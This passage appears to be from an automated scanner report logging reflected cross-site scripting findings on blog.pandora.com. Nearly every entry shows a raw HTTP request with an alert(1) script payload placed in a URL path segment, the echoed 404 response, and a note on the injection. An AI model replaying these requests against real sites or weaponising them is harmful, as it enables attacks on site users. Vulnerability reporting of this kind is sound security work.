Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)</script>0f0e93964d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)</script>4497e666453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)</script>866bd41379a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)</script>dd84e5ab0d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 367
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)</script>ee6bc22579c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)</script>0057edf899 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)</script>b33c32116fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)</script>db22de039d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)</script>ab4f3aefded was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)</script>c4b6b39b005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)</script>f6f7326f783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)</script>135aca784e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)</script>9472b7ae95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)</script>f0ece6ca7d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)</script>e95f295a886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)</script>78dc3d1265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)</script>6156d1c3fc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)</script>1d9d8606f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)</script>2370e6bb9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
